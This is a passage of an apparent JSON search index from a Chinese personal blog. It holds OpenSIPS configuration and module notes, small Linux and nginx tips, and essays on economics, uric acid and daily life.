modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_flag\u0026#34;, 1 ) # ------------------------- request routing logic ------------------- # main routing logic route{ /* ********* ROUTINE CHECKS ********************************** */ # filter too old messages if (!","title":"acc"},{"content":"# # Sample config for MySQL accouting with OpenSIPS # # - db_mysql module must be compiled and installed # # - new columns have to be added since by default only few are recorded # - here are full SQL statements to create acc and missed_calls tables # # CREATE TABLE `acc` ( # `id` int(10) unsigned NOT NULL auto_increment, # `method` varchar(16) NOT NULL default \u0026#39;\u0026#39;, # `from_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `to_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `callid` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `sip_code` char(3) NOT NULL default \u0026#39;\u0026#39;, # `sip_reason` varchar(32) NOT NULL default \u0026#39;\u0026#39;, # `time` datetime NOT NULL default \u0026#39;0000-00-00 00:00:00\u0026#39;, # `src_ip` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `src_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `src_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # INDEX acc_callid (`callid`), # PRIMARY KEY (`id`) # ); # # CREATE TABLE `missed_calls` ( # `id` int(10) unsigned NOT NULL auto_increment, # `method` varchar(16) NOT NULL default \u0026#39;\u0026#39;, # `from_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `to_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `callid` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `sip_code` char(3) NOT NULL default \u0026#39;\u0026#39;, # `sip_reason` varchar(32) NOT NULL default \u0026#39;\u0026#39;, # `time` datetime NOT NULL default \u0026#39;0000-00-00 00:00:00\u0026#39;, # `src_ip` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `src_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `src_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # INDEX acc_callid (`callid`), # PRIMARY KEY (`id`) # ); # # # ----------- global configuration parameters ------------------------ log_level=3 # debug level (cmd line: -dddddddddd) log_stderror=no # (cmd line: -E) /* Uncomment these lines to enter debugging mode */ #debug_mode=yes check_via=no\t# (cmd. line: -v) dns=no # (cmd. line: -r) rev_dns=no # (cmd. line: -R) port=5060 children=4 # # uncomment the following lines for TLS support #disable_tls = 0 #listen = tls:your_IP:5061 #tls_verify_server = 1 #tls_verify_client = 1 #tls_require_client_certificate = 0 #tls_method = TLSv1 #tls_certificate = \u0026#34;/usr/local/etc/opensips/tls/user/user-cert.pem\u0026#34; #tls_private_key = \u0026#34;/usr/local/etc/opensips/tls/user/user-privkey.pem\u0026#34; #tls_ca_list = \u0026#34;/usr/local/etc/opensips/tls/user/user-calist.pem\u0026#34; # ------------------ module loading ---------------------------------- # set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; # Uncomment this if you want to use SQL database # - MySQL loaded for accounting as well loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;textops.so\u0026#34; loadmodule \u0026#34;acc.so\u0026#34; loadmodule \u0026#34;mi_fifo.so\u0026#34; # Uncomment this if you want digest authentication # db_mysql.so must be loaded ! #loadmodule \u0026#34;auth.so\u0026#34; #loadmodule \u0026#34;auth_db.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- mi_fifo params -- modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) # -- usrloc params -- #modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) # Uncomment this if you want to use SQL database # for persistent storage and comment the previous line modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 2) # -- auth params -- # Uncomment if you are using auth module # #modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;calculate_ha1\u0026#34;, yes) # # If you set \u0026#34;calculate_ha1\u0026#34; parameter to yes (which true in this config), # uncomment also the following parameter) # #modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;password_column\u0026#34;, \u0026#34;password\u0026#34;) # -- acc params -- modparam(\u0026#34;acc\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) # flag to record to db modparam(\u0026#34;acc\u0026#34;, \u0026#34;db_flag\u0026#34;, 1) modparam(\u0026#34;acc\u0026#34;, \u0026#34;db_missed_flag\u0026#34;, 2) # flag to log to syslog modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_flag\u0026#34;, 1) modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_missed_flag\u0026#34;, 2) # use extra accounting to record caller and callee username/domain # - take them from From URI and R-URI modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_extra\u0026#34;, \u0026#34;src_user=$fU;src_domain=$fd;dst_user=$rU;dst_domain=$rd\u0026#34;) modparam(\u0026#34;acc\u0026#34;, \u0026#34;db_extra\u0026#34;, \u0026#34;src_user=$fU;src_domain=$fd;dst_user=$rU;dst_domain=$rd\u0026#34;) # ------------------------- request routing logic ------------------- # main routing logic route{ # initial sanity checks -- messages with # max_forwards==0, or excessively long requests if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; # subsequent messages withing a dialog should take the # path determined by record-routing if (loose_route()) { # mark routing logic in request append_hf(\u0026#34;P-hint: rr-enforced\\r\\n\u0026#34;); if(is_method(\u0026#34;BYE\u0026#34;)) { # account BYE for STOP record setflag(1); } route(1); }; # we record-route all messages -- to make sure that # subsequent messages will go through our proxy; that\u0026#39;s # particularly good if upstream and downstream entities # use different transport protocol if (!is_method(\u0026#34;REGISTER\u0026#34;)) record_route(); # account all calls if(is_method(\u0026#34;INVITE\u0026#34;)) { # set accounting on for INVITE (success or missed call) setflag(1); setflag(2); } if (!is_myself(\u0026#34;$rd\u0026#34;)) { # mark routing logic in request append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); # if you have some interdomain connections via TLS #if($ru=~\u0026#34;@tls_domain1.net\u0026#34;) { #\tt_relay(\u0026#34;tls:domain1.net\u0026#34;); #\texit; #} else if($ru=~\u0026#34;@tls_domain2.net\u0026#34;) { #\tt_relay(\u0026#34;tls:domain2.net\u0026#34;); #\texit; #} route(1); }; # if the request is for other domain use UsrLoc # (in case, it does not work, use the following command # with proper names and addresses in it) if (is_myself(\u0026#34;$rd\u0026#34;)) { if (is_method(\u0026#34;REGISTER\u0026#34;)) { # Uncomment this if you want to use digest authentication #if (!www_authorize(\u0026#34;opensips.org\u0026#34;, \u0026#34;subscriber\u0026#34;)) { #\twww_challenge(\u0026#34;opensips.org\u0026#34;, \u0026#34;0\u0026#34;); #\texit; #}; save(\u0026#34;location\u0026#34;); exit; }; if (!is_myself(\u0026#34;$rd\u0026#34;)) { append_hf(\u0026#34;P-hint: outbound alias\\r\\n\u0026#34;); route(1); }; # native SIP destinations are handled using our USRLOC DB if (!lookup(\u0026#34;location\u0026#34;)) { sl_send_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; }; append_hf(\u0026#34;P-hint: usrloc applied\\r\\n\u0026#34;); }; route(1); } route[1] { # send it out now; use stateful forwarding as it works reliably # even for UDP2TCP if (!t_relay()) { sl_reply_error(); }; exit; } ","permalink":"https://wdd.js.org/opensips/ch8/acc-mysql/","summary":"# # Sample config for MySQL accouting with OpenSIPS # # - db_mysql module must be compiled and installed # # - new columns have to be added since by default only few are recorded # - here are full SQL statements to create acc and missed_calls tables # # CREATE TABLE `acc` ( # `id` int(10) unsigned NOT NULL auto_increment, # `method` varchar(16) NOT NULL default \u0026#39;\u0026#39;, # `from_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `to_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `callid` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `sip_code` char(3) NOT NULL default \u0026#39;\u0026#39;, # `sip_reason` varchar(32) NOT NULL default \u0026#39;\u0026#39;, # `time` datetime NOT NULL default \u0026#39;0000-00-00 00:00:00\u0026#39;, # `src_ip` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `src_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `src_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # INDEX acc_callid (`callid`), # PRIMARY KEY (`id`) # ); # # CREATE TABLE `missed_calls` ( # `id` int(10) unsigned NOT NULL auto_increment, # `method` varchar(16) NOT NULL default \u0026#39;\u0026#39;, # `from_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `to_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `callid` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `sip_code` char(3) NOT NULL default \u0026#39;\u0026#39;, # `sip_reason` varchar(32) NOT NULL default \u0026#39;\u0026#39;, # `time` datetime NOT NULL default \u0026#39;0000-00-00 00:00:00\u0026#39;, # `src_ip` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `src_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `src_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # INDEX acc_callid (`callid`), # PRIMARY KEY (`id`) # ); # # # ----------- global configuration parameters ------------------------ log_level=3 # debug level (cmd line: -dddddddddd) log_stderror=no # (cmd line: -E) /* Uncomment these lines to enter debugging mode */ #debug_mode=yes check_via=no\t# (cmd.","title":"acc-mysql"},{"content":"script_trace是核心函数,不需要引入模块。\nscript_trace([log_level, pv_format_string[, info_string]]) This function start the script tracing - this helps to better understand the flow of execution in the OpenSIPS script, like what function is executed, what line it is, etc. Moreover, you can also trace the values of pseudo-variables, as script execution progresses. The blocks of the script where script tracing is enabled will print a line for each individual action that is done (e.g. assignments, conditional tests, module functions, core functions, etc.). Multiple pseudo-variables can be monitored by specifying a pv_format_string (e.g. \u0026#34;$ru---$avp(var1)\u0026#34;). The logs produced by multiple/different traced regions of your script can be differentiated (tagged) by specifying an additional plain string - info_string - as the 3rd parameter. To disable script tracing, just do script_trace(). Otherwise, the tracing will automatically stop at the end the end of the top route. Example of usage: script_trace( 1, \u0026#34;$rm from $si, ruri=$ru\u0026#34;, \u0026#34;me\u0026#34;); will produce: [line 578][me][module consume_credentials] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:111211@opensips.org) [line 581][me][core setsflag] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:111211@opensips.org) [line 583][me][assign equal] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:111211@opensips.org) [line 592][me][core if] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 585][me][module is_avp_set] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 589][me][core if] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 586][me][module is_method] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 587][me][module trace_dialog] -\u0026gt; (INVITE 127.0.0.1 , ruri=sip:tester@opensips.org) [line 590][me][core setflag] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) ","permalink":"https://wdd.js.org/opensips/ch7/cfg-trace/","summary":"script_trace是核心函数,不需要引入模块。\nscript_trace([log_level, pv_format_string[, info_string]]) This function start the script tracing - this helps to better understand the flow of execution in the OpenSIPS script, like what function is executed, what line it is, etc. Moreover, you can also trace the values of pseudo-variables, as script execution progresses. The blocks of the script where script tracing is enabled will print a line for each individual action that is done (e.g. assignments, conditional tests, module functions, core functions, etc.","title":"script_trace 打印opensips的脚本执行过程"},{"content":"之前读完鱼、美元和经济学的故事第一版,令我印象深刻。后来kindle上有出现了这本书的第二版,内容增加了,并且也增加了一些好看的插图。\n我度过不少经济学的书,《国富论》是比较深奥的一本,我只能看懂前面一两章,就读不下去了。\n但是小岛经济学的这本书,真的把经济学里难以理解的东西说的通俗易懂。\n也许经济学本来并不是那么难以理解,只是专家慢慢变多了,他们就把经济学变得难以理解了。因为只有这样,才能显得他们是多么的富有聪明才智。\n1. 自己的生意 每个人实际上都在经营自己的生意,将自己的劳动力卖给出价最高的老板。\n2. 员工的价值 员工的价值主要取决于三个方面:\n需求(老板是否需要员工所掌握的技能) 供应(有多少人具备这些技能) 生产力(员工对那些工作完成的程度如何) 所以,你的价值并不会因为你吃苦耐劳而升高。\n3. 纽约地铁 纽约的地址由私营公司建设,40年内都是由私营公司负责运营。虽然地铁造价不菲,但是还是实现了盈利。更值得一提的是,40年里车票的价格从未上涨。\n这是值得深思的地方,有些公共事情,私营公司来做可能要比政府做的更好、效率更高。\n政府对公共设施的垄断,很大的可能会造成效率低下和贪污腐败。\n4. 经济的目的 提供就业岗位并不是经济的目的,经济的目的是不断提高生产力。\n5. 膨胀与紧缩 通货膨胀就是货币的供给增加,相反的就是通货紧缩。价格并不会膨胀或者紧缩,价格只能上涨或者下跌。膨胀的不是价格,而是货币供给。\n6. 谁需要你的货币? 如果没有人想购买你的产品,也就没有人需要你的货币。\n美国的很多产品在全世界都很吃香,所以美元是很多国家都需要的。\n7. 人们为何消费? 经济并不会因为人们的消费而增长,而是经济增长会自然的带动人们的消费。\n但是目前看来,眼下最为火爆的就是“带货”这个词,各种人物,无论是公众明星还是普通人,都想来搞带货。\n各种新闻报道也在大肆宣扬,某某明星直播带货xxx亿元。\n当你被xxx亿元吸引时,你是否也曾暗暗思考过,这些钱来自哪里? 买这些东西对于消费者来说,又有什么好处。\n在经济以为疫情的影响和下行时,为什么会有那么多人疯狂购物呢?\n天下皆知美之为美,斯恶已。我想这种带货的模式,也许就快要到尽头了。\n8. 量化宽松 北京的白菜(一到)浙江,便用红头绳系住菜根,倒挂在水果店头,尊为“胶菜”;福建野生着的芦荟,(运往)北京就请进温室,且美其名曰“龙舌兰”. 《藤野先生》鲁迅\n明明白白的通货膨胀,到了经济学家和政客的嘴里,美其名曰“量化宽松”。\n","permalink":"https://wdd.js.org/posts/2020/05/kn7c4e/","summary":"之前读完鱼、美元和经济学的故事第一版,令我印象深刻。后来kindle上有出现了这本书的第二版,内容增加了,并且也增加了一些好看的插图。\n我度过不少经济学的书,《国富论》是比较深奥的一本,我只能看懂前面一两章,就读不下去了。\n但是小岛经济学的这本书,真的把经济学里难以理解的东西说的通俗易懂。\n也许经济学本来并不是那么难以理解,只是专家慢慢变多了,他们就把经济学变得难以理解了。因为只有这样,才能显得他们是多么的富有聪明才智。\n1. 自己的生意 每个人实际上都在经营自己的生意,将自己的劳动力卖给出价最高的老板。\n2. 员工的价值 员工的价值主要取决于三个方面:\n需求(老板是否需要员工所掌握的技能) 供应(有多少人具备这些技能) 生产力(员工对那些工作完成的程度如何) 所以,你的价值并不会因为你吃苦耐劳而升高。\n3. 纽约地铁 纽约的地址由私营公司建设,40年内都是由私营公司负责运营。虽然地铁造价不菲,但是还是实现了盈利。更值得一提的是,40年里车票的价格从未上涨。\n这是值得深思的地方,有些公共事情,私营公司来做可能要比政府做的更好、效率更高。\n政府对公共设施的垄断,很大的可能会造成效率低下和贪污腐败。\n4. 经济的目的 提供就业岗位并不是经济的目的,经济的目的是不断提高生产力。\n5. 膨胀与紧缩 通货膨胀就是货币的供给增加,相反的就是通货紧缩。价格并不会膨胀或者紧缩,价格只能上涨或者下跌。膨胀的不是价格,而是货币供给。\n6. 谁需要你的货币? 如果没有人想购买你的产品,也就没有人需要你的货币。\n美国的很多产品在全世界都很吃香,所以美元是很多国家都需要的。\n7. 人们为何消费? 经济并不会因为人们的消费而增长,而是经济增长会自然的带动人们的消费。\n但是目前看来,眼下最为火爆的就是“带货”这个词,各种人物,无论是公众明星还是普通人,都想来搞带货。\n各种新闻报道也在大肆宣扬,某某明星直播带货xxx亿元。\n当你被xxx亿元吸引时,你是否也曾暗暗思考过,这些钱来自哪里? 买这些东西对于消费者来说,又有什么好处。\n在经济以为疫情的影响和下行时,为什么会有那么多人疯狂购物呢?\n天下皆知美之为美,斯恶已。我想这种带货的模式,也许就快要到尽头了。\n8. 量化宽松 北京的白菜(一到)浙江,便用红头绳系住菜根,倒挂在水果店头,尊为“胶菜”;福建野生着的芦荟,(运往)北京就请进温室,且美其名曰“龙舌兰”. 《藤野先生》鲁迅\n明明白白的通货膨胀,到了经济学家和政客的嘴里,美其名曰“量化宽松”。","title":"小岛经济学: 鱼、美元和经济的故事"},{"content":"-.slice\n用 \u0026ndash; 表示参数已经结束\ncat \u0026ndash; -.slicevim \u0026ndash; -.slice\n","permalink":"https://wdd.js.org/posts/2020/05/ei2y93/","summary":"-.slice\n用 \u0026ndash; 表示参数已经结束\ncat \u0026ndash; -.slicevim \u0026ndash; -.slice","title":"文件名以-开头"},{"content":" 负载均衡只能均衡INVITE, 不能均衡REGISTER请求。因为load_blance底层是使用dialog模块去跟踪目标地址的负载情况。 load_balance方法会改变INVITE的$du, 而不会修改SIP URL 呼叫结束的时候,目标地址的负载会自动释放 选择逻辑 网关A 网关B 通道数 30 60 正在使用的通道数 20 55 空闲通道数 10 5 load_balance是会先选择最大可用资源的目标地址。假如A网关的最大并发呼叫是30, B网关最大并发呼叫是60。在某个时刻,A网关上已经有20和呼叫了, B网关上已经有55个呼叫。 此时load_balance会优先选择网关A。\n参考 https://opensips.org/Documentation/Tutorials-LoadBalancing-1-9 ","permalink":"https://wdd.js.org/opensips/ch6/load-balance/","summary":" 负载均衡只能均衡INVITE, 不能均衡REGISTER请求。因为load_blance底层是使用dialog模块去跟踪目标地址的负载情况。 load_balance方法会改变INVITE的$du, 而不会修改SIP URL 呼叫结束的时候,目标地址的负载会自动释放 选择逻辑 网关A 网关B 通道数 30 60 正在使用的通道数 20 55 空闲通道数 10 5 load_balance是会先选择最大可用资源的目标地址。假如A网关的最大并发呼叫是30, B网关最大并发呼叫是60。在某个时刻,A网关上已经有20和呼叫了, B网关上已经有55个呼叫。 此时load_balance会优先选择网关A。\n参考 https://opensips.org/Documentation/Tutorials-LoadBalancing-1-9 ","title":"负载均衡模块load_balance"},{"content":"-a -R -r /recording -S spool -P -a 所有的通话都录音 -R 不要把RTCP也写文件 -r 指定录音文件的位置 -S 临时文件的位置,注意不要和录音文件位置相同 -P 录成pcap文件的格式,而不要录成默认的 Ad-hoc的模式 ","permalink":"https://wdd.js.org/opensips/ch4/rtp-record/","summary":"-a -R -r /recording -S spool -P -a 所有的通话都录音 -R 不要把RTCP也写文件 -r 指定录音文件的位置 -S 临时文件的位置,注意不要和录音文件位置相同 -P 录成pcap文件的格式,而不要录成默认的 Ad-hoc的模式 ","title":"rtpproxy录音"},{"content":"隐藏版本号 nginx会在响应头上添加如下的头。\nServer: nginx/1.17.9 如果不想在Server部分显示出nginx的版本号,需要在nginx.conf的http{}部分设置\nhttp { server_tokens off; } 然后重启nginx, nginx的响应头就会变成。\nServer: nginx ","permalink":"https://wdd.js.org/posts/2020/05/es9hvu/","summary":"隐藏版本号 nginx会在响应头上添加如下的头。\nServer: nginx/1.17.9 如果不想在Server部分显示出nginx的版本号,需要在nginx.conf的http{}部分设置\nhttp { server_tokens off; } 然后重启nginx, nginx的响应头就会变成。\nServer: nginx ","title":"nginx 配置不显示版本号"},{"content":"pwdx pid lsof -p pid | grep cwd ","permalink":"https://wdd.js.org/posts/2020/05/azkyhl/","summary":"pwdx pid lsof -p pid | grep cwd ","title":"获取进程工作目录"},{"content":" 人的大脑中有个器官,叫做下丘脑。下丘脑有控制体温控制的功能。刚出生的婴儿,下丘脑发育不完全,无法调节自己的体温。所以一般都把小宝宝包被子里,而她只能通过哭闹反应自己的不适。\n随着身体的发育,下丘脑逐渐掌握体温控制的功能。\n白天越来越长,从电脑屏幕上抬起头,发现已经有人收拾桌面,准备好要下班了。\n不知不觉,已经六点多了。\n夕阳西下,晚霞似火,凉风习习。\n漕河泾的腾讯大楼,影子被拉到地下停车场的入口,彷佛是情人间的法式舌吻。\n园区里行人匆匆,车辆缓缓~\n掐指算起,毕业已四年。时间如白驹过隙,指间流沙。\n恍然间,三十将至,尚未而立。\n小孩子爱憎分明,喜欢与不喜欢就直接说,不懂得拐弯抹角。\n成年人放下爱憎,只有生存\n无论如何,你应当体谅别人的世界与你的不同。\n对你来说,很容易理解的问题。可能对别人来说,是难以理解的。\n不要将自己当作干柴,稍微一点,就成烈火。\n当你知道你将要说的话会让别人难堪时,请咽下去吧。\n不要轻易否定一个人的工作价值,每个人都希望自己得到肯定。\n无论是对待陌生人、同事、或者是朋友。\n我们不是刚出生的婴儿,我们有完全发育的下丘脑。\n控制你的体温,同时也控制你的脾气,你说话的方式。\n每个人都值得温柔以待,即使是你不喜欢的人。\n你好,下丘脑~\n","permalink":"https://wdd.js.org/posts/2020/05/nkegg6/","summary":"人的大脑中有个器官,叫做下丘脑。下丘脑有控制体温控制的功能。刚出生的婴儿,下丘脑发育不完全,无法调节自己的体温。所以一般都把小宝宝包被子里,而她只能通过哭闹反应自己的不适。\n随着身体的发育,下丘脑逐渐掌握体温控制的功能。\n白天越来越长,从电脑屏幕上抬起头,发现已经有人收拾桌面,准备好要下班了。\n不知不觉,已经六点多了。\n夕阳西下,晚霞似火,凉风习习。\n漕河泾的腾讯大楼,影子被拉到地下停车场的入口,彷佛是情人间的法式舌吻。\n园区里行人匆匆,车辆缓缓~\n掐指算起,毕业已四年。时间如白驹过隙,指间流沙。\n恍然间,三十将至,尚未而立。\n小孩子爱憎分明,喜欢与不喜欢就直接说,不懂得拐弯抹角。\n成年人放下爱憎,只有生存\n无论如何,你应当体谅别人的世界与你的不同。\n对你来说,很容易理解的问题。可能对别人来说,是难以理解的。\n不要将自己当作干柴,稍微一点,就成烈火。\n当你知道你将要说的话会让别人难堪时,请咽下去吧。\n不要轻易否定一个人的工作价值,每个人都希望自己得到肯定。\n无论是对待陌生人、同事、或者是朋友。\n我们不是刚出生的婴儿,我们有完全发育的下丘脑。\n控制你的体温,同时也控制你的脾气,你说话的方式。\n每个人都值得温柔以待,即使是你不喜欢的人。\n你好,下丘脑~","title":"你好,下丘脑"},{"content":"从细胞说起 人体由细胞组成。人体的细胞中大约有40-60万亿个。细胞无时无刻不再新老更替、新陈代谢。\n微观世界的细胞变化,反应在人体生产,就是一个人从成长到衰老的过程。\n细胞中有一种重要的物质,核酸。核酸是脱氧核糖核酸(DNA)和核糖核酸(RNA)的总称。\n核酸由无数的核苷酸组成,核苷酸里有一种物质叫做嘌呤。而嘌呤和人体的尿酸有着密不可分的关系。\n除了作为遗传物质的一部分,嘌呤中的腺嘌呤也是腺苷三磷酸(ATP)的重要组成部分。APT是人体直接的能量来源。\n在剧烈运动时,APT会进一步分解成腺嘌呤。\n总之:尿酸和嘌呤的关系非常密切。人体细胞的遗传物质以及作为能量来源的APT都会产生嘌呤。\n尿酸来源分类 内源性尿酸: 来自人体自身细胞衰亡,残留的嘌呤经过酶的作用产生尿酸 外源性尿酸: 大多来自食物中的嘌呤类化合物、核酸、核蛋白等物质、经过酶的作用下产生尿酸。 我们身体中的尿酸2/3来自自身的生命活动, 1/3来自食物。\n尿酸的合成与排泄 大部分的嘌呤在肝脏中经过氧化代谢、变成尿酸。在词过程中,有两类酶扮演着重要作用。 抑制尿酸合成的酶 促进尿酸合成的酶 2/3的尿酸通过肾脏排出。肾脏只有也有能够促进或者抑制尿酸重吸收的酶。 1/3的尿酸通过肠道排出 所以尿酸较高的患者,医生会让你抽血查肝功能和肾功能,如果肝脏中的某些指标异常,也会进一步通过B超去做进一步的判断。\n很多人误以为尿酸是查尿液,实际上这是被尿酸的名字误解了,尿酸是抽血检测的。\n人体中酶在声明活动中扮演着重要的角色。酶就好像是太极中的阴与阳一样,相互制衡达到平衡之时,身体才会健康。否则阴阳失衡,必然会存在身体病变。\n另外一些降低尿酸的药品,例如苯溴马隆片,其药理也是通过降低肾脏对尿酸的重吸收,来促进尿酸的排泄的。\n食物中的尿酸对人体影响有多大? 具体哪些不能吃,哪些能吃,网上都有很多资料了。总之,大鱼大肉是要尽量避免的。食物主要要以清淡为主,吃饭不要吃撑,尽量迟到7分饱,或者迟到不饿为佳。\n高尿酸的危害 有溶解度相关知识的同学都会知道,溶质在溶液中都是由溶解度的,超过溶解度之后,物质就会析出。尿酸也是如此,过饱和的尿酸会析出称为尿酸结晶。\n这些结晶会沉积在关节和各种软组织,就可能造成这些部位的损害。\n当尿酸结晶附着在关节软骨表面上的滑膜上时,血液中的白细胞会把它当做敌人,释放各种酶去进攻。这些酶在进攻敌人的同时,对自身的关节软骨的溶解和自身软组织的损伤。 对痛风患者而言,感受到的就是苦不堪言的痛风性关节炎\n另外,大量的尿酸最终是通过肾脏排泄的,如果尿酸在肾脏上析出。对肾脏也会造成难以修复的损害,甚至患上尿毒症。光听这个尿毒症的名字,你就应该这道,这个病有多厉害。当你管不住自己嘴的时候,想想尿毒症吧。\n不要等到失去任劳任怨的肾脏之后,再后悔莫及。\n参考 https://baike.baidu.com/item/%E4%BA%BA%E4%BD%93%E7%BB%86%E8%83%9E ","permalink":"https://wdd.js.org/posts/2020/05/teadt5/","summary":"从细胞说起 人体由细胞组成。人体的细胞中大约有40-60万亿个。细胞无时无刻不再新老更替、新陈代谢。\n微观世界的细胞变化,反应在人体生产,就是一个人从成长到衰老的过程。\n细胞中有一种重要的物质,核酸。核酸是脱氧核糖核酸(DNA)和核糖核酸(RNA)的总称。\n核酸由无数的核苷酸组成,核苷酸里有一种物质叫做嘌呤。而嘌呤和人体的尿酸有着密不可分的关系。\n除了作为遗传物质的一部分,嘌呤中的腺嘌呤也是腺苷三磷酸(ATP)的重要组成部分。APT是人体直接的能量来源。\n在剧烈运动时,APT会进一步分解成腺嘌呤。\n总之:尿酸和嘌呤的关系非常密切。人体细胞的遗传物质以及作为能量来源的APT都会产生嘌呤。\n尿酸来源分类 内源性尿酸: 来自人体自身细胞衰亡,残留的嘌呤经过酶的作用产生尿酸 外源性尿酸: 大多来自食物中的嘌呤类化合物、核酸、核蛋白等物质、经过酶的作用下产生尿酸。 我们身体中的尿酸2/3来自自身的生命活动, 1/3来自食物。\n尿酸的合成与排泄 大部分的嘌呤在肝脏中经过氧化代谢、变成尿酸。在词过程中,有两类酶扮演着重要作用。 抑制尿酸合成的酶 促进尿酸合成的酶 2/3的尿酸通过肾脏排出。肾脏只有也有能够促进或者抑制尿酸重吸收的酶。 1/3的尿酸通过肠道排出 所以尿酸较高的患者,医生会让你抽血查肝功能和肾功能,如果肝脏中的某些指标异常,也会进一步通过B超去做进一步的判断。\n很多人误以为尿酸是查尿液,实际上这是被尿酸的名字误解了,尿酸是抽血检测的。\n人体中酶在声明活动中扮演着重要的角色。酶就好像是太极中的阴与阳一样,相互制衡达到平衡之时,身体才会健康。否则阴阳失衡,必然会存在身体病变。\n另外一些降低尿酸的药品,例如苯溴马隆片,其药理也是通过降低肾脏对尿酸的重吸收,来促进尿酸的排泄的。\n食物中的尿酸对人体影响有多大? 具体哪些不能吃,哪些能吃,网上都有很多资料了。总之,大鱼大肉是要尽量避免的。食物主要要以清淡为主,吃饭不要吃撑,尽量迟到7分饱,或者迟到不饿为佳。\n高尿酸的危害 有溶解度相关知识的同学都会知道,溶质在溶液中都是由溶解度的,超过溶解度之后,物质就会析出。尿酸也是如此,过饱和的尿酸会析出称为尿酸结晶。\n这些结晶会沉积在关节和各种软组织,就可能造成这些部位的损害。\n当尿酸结晶附着在关节软骨表面上的滑膜上时,血液中的白细胞会把它当做敌人,释放各种酶去进攻。这些酶在进攻敌人的同时,对自身的关节软骨的溶解和自身软组织的损伤。 对痛风患者而言,感受到的就是苦不堪言的痛风性关节炎\n另外,大量的尿酸最终是通过肾脏排泄的,如果尿酸在肾脏上析出。对肾脏也会造成难以修复的损害,甚至患上尿毒症。光听这个尿毒症的名字,你就应该这道,这个病有多厉害。当你管不住自己嘴的时候,想想尿毒症吧。\n不要等到失去任劳任怨的肾脏之后,再后悔莫及。\n参考 https://baike.baidu.com/item/%E4%BA%BA%E4%BD%93%E7%BB%86%E8%83%9E ","title":"尿酸简史"},{"content":"之前我写过OpenSIPS的文章,所以在学习Kamailio是,会尝试和OpenSIPS做对比。\n从下图可以看出,Kamailio和Opensips算是同根同源了。很多语法、伪变量、模块使用方式,两者都极为相似。\n不一样的点 然而总体来说,kamailio相比OpenSIPS,更加灵活。 如果有机会,尝试下kamailio也未尝不可。而且kamailio的git start数量比OpenSIPS多很多,而且issue也比OpenSIPS少。\nKamailio 有wiki社区,注册之后,可以来编辑文档,相比于OpenSIPS只有官方文档,kamailio显得更容易让人亲近,提高了用户的参与度。 脚本上 kamailio支持三种不同的注释风格,opensips只支持一种 kamailio支持类似c语言的宏定义的方式写脚本,因而kamailio的脚本可以不借助外部工具的情况下,写的非常灵活。可以参考 